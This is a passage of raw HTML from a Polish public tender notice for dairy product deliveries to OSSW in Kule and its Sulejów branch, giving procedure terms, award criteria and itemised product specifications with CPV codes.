id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Wykazu wykonanych dostaw odpowiadających swoim rodzajem dostawie stanowiącej przedmiot zamówienia według wzoru stanowiącego załącznik nr 4 do SIWZ.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy PZP, przekaże zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy PZP.2. Wypełniony i podpisany formularz ofertowy - załącznik nr 1 do SIWZ. 3. Wypełniony i podpisany formularz cenowy w zakresie zadania od 1 do 2 - załącznik nr 2 do SIWZ. </span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow">Nie</span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow">Nie</span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow">Nie</span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci">Nie</span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Najkrótszy czas wymiany wadliwego towaru</TD><TD style='border: 1px solid black;border-collapse: collapse;'>30,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Termin płatności</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie">Nie</span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial">Nie</span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu">Nie</span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-03-21</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">ofertę należy sporządzić w języku polskim</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Dostawy artykułów mleczarskich dla OSSW w Kulach </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Margaryna	15431100-9	Margaryna mleczna do gotowania, smażenia i pieczenia, zawartość tłuszczu roślinnego 65-80 %. Opakowanie jednostkowe bezpośrednio folia aluminiowa, pośrednie - karton papierowy, waga 225- 250g. Termin przydatności do spożycia 60 dni liczony od dnia dostawy.	kg	150.2	Serek homogenizowany z twarogu odtłuszczonego, typu "Danio" lub równoważny.	15500000-3	Twaróg odtłuszczony, różne smaki. Opakowanie jednostkowe kubek z tworzywa sztucznego, poj. 140 - 150 g, termin przydatności do spożycia min. 14 dni liczony od dnia dostawy.	kg	200.3	Mleko	15511000-3	Wygląd i barwa jednolita, smak i zapach czysty bez obcych posmaków i zapachów, barwa jasnokremowa, konsystencja płynna. Mleko normalizowane, pasteryzowane, zawartość tłuszczu 2%, zawartość białka 3%. Opakowanie bezpośrednie: folia, lub butelka plastikowa o poj. 900-1000ml. Termin przydatności do spożycia nie krótszy niż 5 dni od dnia dostawy.	l	1200.4	Mleko zagęszczone niesłodzone	15511200-5	Mleko zagęszczone, niesłodzone sterylizowane. Zawiera 25% suchej masy całkowitej w tym:7,5% tłuszczu oraz 17,5% suchej masy beztłuszczowej. Stosuje się do kawy, herbaty, kakao, oraz do celów kulinarnych. Waga jedn. 500g.	kg	2.5	Mleko w kartonie 2% tłuszczu bez środków konserwujących	15511210-8	Mleko UHT, o zawartości 2% tłuszczu, bez środków konserwujących. Opakowanie jednostkowe - karton o poj. 0,2-1 litr, termin przydatności do spożycia min. 4 miesiące liczony od dnia dostawy.	l	200.6	Śmietana	15512000-0	Śmietana słodka 18 %,opakowanie jednostkowe kubek z tworzywa sztucznego, poj. 180 - 250g, termin przydatności do spożycia min. 14 dni liczony od dnia dostawy.	kg	300.7	Śmietanka do kawy	15512100-1	Śmietanka o zawartości tłuszczu 10 %. poj. 10ml 1 kubeczek x 10 szt. w opakowaniu zbiorczym. Termin przydatności do spożycia nie krótszy niż 14 dni od dnia dostawy.	l	2.8	Masło	15530000-2	Kostka starannie uformowana, smak lekko kwaśny, mlekowy, lekki posmak pasteryzacji, lekko tłuszczowy. Barwa jednolita, o zawartości tłuszczu nie mniej niż 82%, Opakowanie bezpośrednie to folia aluminiowa, pośrednie - karton papierowy, waga nie mniej niż 200g. Termin przydatności do spożycia do 30 dni liczony od dnia dostawy.	kg	800.9	Serek bez cukru ziarnisty, typu "Wiejski" lub równoważny. 15542000-9	Serek ziarnisty o różnych dodatkach smakowych (szczypiorek, koperek, cebula). Opakowanie jednostkowe kubek z tworzywa sztucznego, poj. 150-200g; termin przydatności do spożycia min. 10 dni liczony od dnia dostawy.	kg	250.10	Serek do chleba o różnych smakach, typu "Kanapkowy" lub równoważny. 15542000-9	Serek do chleba o różnych dodatkach smakowych (zioła, szczypiorek, śmietana). Opakowanie jednostkowe kubek z tworzywa sztucznego, poj. 90 -100g; termin przydatności do spożycia min. 10 dni liczony od dnia dostawy.	kg	180.11	Twaróg półtłusty	15542100-0	Twaróg półtłusty krajanka, o smaku kwaśnym. Zawartość tłuszczu 4,0-4,5 %, pakowany w pergamin. Termin przydatności do spożycia nie mniej niż 7 dni od dnia dostawy.	kg	700.12	Ser topiony 15542200-1	Ser topiony naturalny kremowy; barwa naturalna; smak i zapach: charakterystyczny dla sera naturalnego klasy I, z którego wyprodukowano ser topiony, ze swoistym posmakiem topnienia w kształcie trójkąta o masie 22,5g - 25g. w opakowaniu 180 - 200 g; o różnych smakach i dodatk. np. z dodatkiem szynki, papryki, czosnku, pieczarek, ziół, szczypiorku. Zawartość tłuszczu w suchej masie nie mniej niż 27%. Termin przydatności do spożycia min. 60 dni od dnia dostawy	kg	140.13	Ser feta	15542300-2	Ser feta sałatkowo - kanapkowy. Serek miękki solankowy, pełnotłusty, z mleka pasteryzowanego ok. 45% tłuszczu w suchej masie. Termin przydatności do spożycia nie mniej niż 10 dni od dnia dostawy Opakowanie - karton 260 - 300g.	kg	50.14	Ser żółty, typu holenderskiego / Gouda lub Edamski/ lub równoważny. 15544000-3	Ser podpuszczkowy dojrzewający wyprodukowany z mleka pasteryzowanego o ustalonej zawartości tłuszczu z dodatkiem szczepionek kultur mezofilnych i podpuszczki, w blokach typu holenderskiego o bokach lekko wypukłych i zaokrąglonych, o barwie jasnożółtej, smak i zapach delikatny, łagodny, miąższ w miarę miękki, elastyczny, jednolity w całej masie., o terminie przydatności do spożycia do 90 dni od daty produkcji. Opakowanie : woreczek z folii termokurczliwej, waga do 4 kg. kg	500.15	Ser żółty wędzony, typu "rolada ustrzycka" lub równoważny.	15544000-3	Walec o średnicy 7 cm. Zawartość tłuszczu 45% w suchej masie; pakowany próżniowo; widoczne ślady siatki; masa około 300-1000g. Termin przydatności do spożycia nie krótszy niż 30 dni od dnia dostawy. Wędzony w sposób naturalny kl. I kg	150.16	Serek homogenizowany z twarożku odtłuszczonego z witaminami, typu "Bakuś" lub równoważny.	15551000-5	Serek homogenizowany o różnych smakach z twarożku odtłuszczonego , poj. 90 - 100g z witaminami A,D,E. Opakowanie - kubek z tworzywa sztucznego. Termin przydatności do spożycia min. 14 dni liczony od dnia dostawy.	kg	150.17	Serek homogenizowany chudy 15551000-5	Serek chudy z mleka pasteryzowanego, różne smaki, opakowanie jednostkowe kubek z tworzywa sztucznego, poj.140 - 150g, termin przydatności do spożycia min. 14 dni liczony od dnia dostawy. kg	200.18	Jogurt naturalny bez cukru	15551310-1	Jogurt naturalny bez cukru. Opakowanie jednostkowe - kubek z tworzywa sztucznego, poj. 150- 200g. Termin przydatności do spożycia min. 14 dni liczony od dnia dostawy.	kg	150.19	Jogurt owocowy	15551320-4 Konsystencja jednolita, kremowa bez grudek, lekko luźna z widocznymi kawałkami owoców użytych do produkcji /wsad owoców od 4,5 - 2,5 %/; barwa naturalna charakterystyczna dla użytych owoców ; smak i zapach: czysty, łagodny, słodko - kwaśny, smakowo właściwy dla owoców będących składnikiem jogurtu. Zawartość tłuszczu w suche masie nie mniej niż 1,5 - 2,5%. Różne smaki owocowe, poj.100-150g. Opakowanie jednostkowe- kubek z tworzywa sztucznego. Termin przydatności do spożycia min. 14 dni liczony od dnia dostawy.	kg	400.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15500000-3, 15431100-9, 15511200-5, 15511210-8, 15512000-0, 15512100-1, 15530000-2, 15542200-1, 15542300-2, 15544000-3, 15551310-1, 15551320-4<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-03-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Najktótszy czas wymiany wadliwego towaru</td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin płatności</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Dostawy artykułów mleczarskich dla OSSW w Kulach Oddział Zamiejscowy w Sulejowie</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Margaryna	15431100-9	Margaryna mleczna do gotowania, smażenia i pieczenia, zawartość tłuszczu roślinnego nie mniej niż 65% nie więcej niż 80 %. Opakowanie jednostkowe bezpośrednio folia aluminiowa, pośrednie - karton papierowy, waga ok. 225-250g. Termin przydatności do spożycia 60 dni liczony od dnia dostawy.	kg	452	Serek homogenizowany 15500000-3	Serek chudy z mleka pasteryzowanego, różne smaki. Opakowanie jednostkowe, kubek z tworzywa sztucznego, poj. ok.150g. Termin przydatności do spożycia min. 14 dni liczony od dnia dostawy. kg	1203	Deser mleczny	15500000-3	Deser mleczny z kaszą manną lub ryżem o różnych smakach; smak i zapach: czysty, łagodny, słodko-kwaśny, smakowo właściwy dla zawartego składnika. Opakowanie jednostkowe ok.150-200g, kubek z tworzywa sztucznego. Termin przydatności do spożycia: nie krótszy niż 14 dni od daty dostawy.	kg	1204	Pudding	15500000-3	Deser o konsystencji budyniu, o smakach: waniliowy, czekoladowy, waniliowo - czekoladowy, składniki: mleko, cukier, skrobia modyfikowana, substancje zagęszczające, barwniki. Opakowanie jednostkowe ok.150g, kubek z tworzywa sztucznego. Termin przydatności do spożycia: nie krótszy niż 14 dni od daty dostawy.	kg	1205	Mleko 15511210-8	Mleko UHT o zawartości 2 % tłuszczu. Wygląd i barwa jednolita, smak i zapach czysty bez obcych posmaków i zapachów, barwa jasnokremowa, konsystencja płynna. Opakowanie jednostkowe: karton z laminatu wielowarstwowego , o poj. 1l. Termin przydatności do spożycia nie krótszy niż 90 dni od dnia dostawy.	l	15006	Śmietana	15512000-0	Śmietana o zawartości tłuszczu 12%, opakowanie jednostkowe: kubek z tworzywa sztucznego, poj. ok. 400-500g, termin przydatności do spożycia min. 14 dni liczony od dnia dostawy.	kg	2107	Masło 15530000-2	Kostka starannie uformowana, smak lekko kwaśny, mlekowy, lekki posmak pasteryzacji, lekko tłuszczowy. Barwa jednolita, o zawartości tłuszczu nie mniej niż 80%. Opakowanie bezpośrednie to folia aluminiowa, opakowanie pośrednie - karton papierowy, waga ok. 200 g. Termin przydatności do spożycia do 30 dni liczony od dnia dostawy.	kg	6008	Twaróg półtłusty	15542100-0	Twaróg półtłusty krajanka, o smaku kwaśnym. Zawartość tłuszczu ok. 4,0-4,5 %, o pakowany w pergamin, termin przydatności do spożycia min. 7 dni liczony od dnia dostawy.	kg	1209	Twaróg sernikowy	15542100-0	Barwa jednolita, biała do lekko kremowej; smak i zapach: czysty, typowy dla twarożku, bez obcych zapachów, smak lekko kwaśny, lekko słonawy; konsystencja i struktura dobra do smarowania, jednolita w całej masie, bez grudek, lekko mączysty; pakowany hermetycznie w kubki o masie ok. 1kg . Termin przydatności do spożycia: nie krótszy niż 14 dni od daty dostawy.	kg	12010	Serek bez cukru ziarnisty	15542100-0	Serek ziarnisty o różnych dodatkach smakowych (szczypiorek, koperek, cebula) lub równoważny. Opakowanie jednostkowe kubek z tworzywa sztucznego, poj. ok. 150-200g; termin przydatności do spożycia min. 10 dni liczony od dnia dostawy.	kg	20011	Serek do chleba	15542100-0	Serek do chleba termizowany. Skład: ser twarogowy, masło, żelatyna wieprzowa, możliwy wsad czosnku, ziół, papryki i ogórka. Opakowanie jednostkowe kubek z tworzywa sztucznego, poj. ok. 100-150 g. termin przydatności do spożycia min. 10 dni liczony od dnia dostawy.	kg	9012	Serek włoski typu Capri lub równoważny.	15542200-1	Skład: serwatka, mleko pasteryzowane, sól spożywcza, kwas cytrynowy jako regulator kwasowości. Waga opakowania ok. 220-250g. Termin przydatności do spożycia: nie krótszy niż 14 dni od daty dostawy.	kg	4013	Ser topiony- krążki	15542200-1	Ser 